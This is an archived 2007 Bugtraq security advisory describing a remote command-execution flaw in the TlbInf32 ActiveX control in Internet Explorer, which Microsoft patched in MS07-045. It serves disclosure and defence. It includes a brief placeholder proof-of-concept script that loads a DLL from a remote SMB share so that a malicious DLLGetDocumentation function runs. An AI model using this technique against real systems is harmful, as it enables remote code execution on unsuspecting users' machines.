lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 16 Aug 2007 11:06:14 +1200
From: "Brett Moore" <brett.moore@...urity-assessment.com>
To: <bugtraq@...urityfocus.com>
Subject: TlbInf32 ActiveX Command Execution

========================================================================
= TlbInf32 ActiveX Command Execution
=
= MS Bulletin posted:   
= http://www.microsoft.com/technet/security/Bulletin/MS07-045.mspx
=
= Affected Software:
=      Internet Explorer
=         tlbInf32.dll
=         vstlbinf.dll
=
= Public disclosure on Wednesday August 15, 2007
========================================================================

The TypeLib Information object library , implemented in TlbInf32.dll,
is a set of COM objects designed to make type library browsing 
functionality easily accessible to both Visual Basic and C++
programmers.

Although it is not marked as safe for scripting in the registry, it does
implement IObjectSafety.

   Report for Clsid: {8B217746-717D-11CE-AB5B-D41203C10000}
   RegKey Safe for Script: False
   RegKey Safe for Init: False
   Implements IObjectSafety: True
   IDisp Safe:  Safe for untrusted: caller,data


The TypeLibInfoFromFile() function is used to open a file and retrieve
the
typelib information from it.

   TypeLibInfoFromFile(ByVal FileName As String) As TypeLibInfo

This function will accept a webdav/smb share to a DLL file, allowing the
retrieval of information from a DLL hosted on a remote server.

========================================================================
TlbInf32.chm 
  Type libraries can contain help information for the library itself
  (TypeLibInfo object), each TypeInfo (TypeInfo object), and each member
  (MemberInfo object). This information is available in several
different 
  forms.

  HelpString is the documentation string which appears as a short 
  description of the string in object browsers. If the optional LCID 
  (Language/Country identifier) is specified, then the returned string
is
  localized if possible.

  Documentation strings can be stored either in the type library
directly
  or retrieved via a call to the DLLGetDocumentation entry point in the
Dll
  specified by the HelpStringDll property. 
  
  The HelpStringContext is passed to the HelpStringDll to get the
correct
  documentation string for the object. The HelpStringDll and 
  HelpStringContext properties values are used automatically by the 
  HelpString property.
========================================================================


If the DLL file specified in the call to TypeLibInfoFromFile() has been 
modified to direct the HelpStringDll property to a DLL which exports
a malicious DLLGetDocumentation function, then this function will be 
executed when a request for the HelpString property is made. 

   <object width=1000 height=20 classid="CLSID:<CLASSID>"
name=test></object>
   x= test.TypeLibInfoFromFile("\\\\IPADDRESS\\SHARE\\remote.dll")
   ' Call the remote DLLGetDocumentation function
   alert(x.Interfaces.Item(a).Members.Item(b).HelpString)

== Solutions ==

Install the vendor supplied patch.
    http://www.microsoft.com/technet/security/Bulletin/MS07-045.mspx

== Credit ==

Discovered and advised to Microsoft November 23 2006 by Brett Moore of
Security-Assessment.com

As this is my last advisory release before I leave sa.com and head off 
into the future, I gotta say thanx to the team there, its been a blast
guys. 

All you kiwis overseas have you thought about a trip home.
www.kiwicon.org

+-SoSD-+

Powered by blists - more mailing lists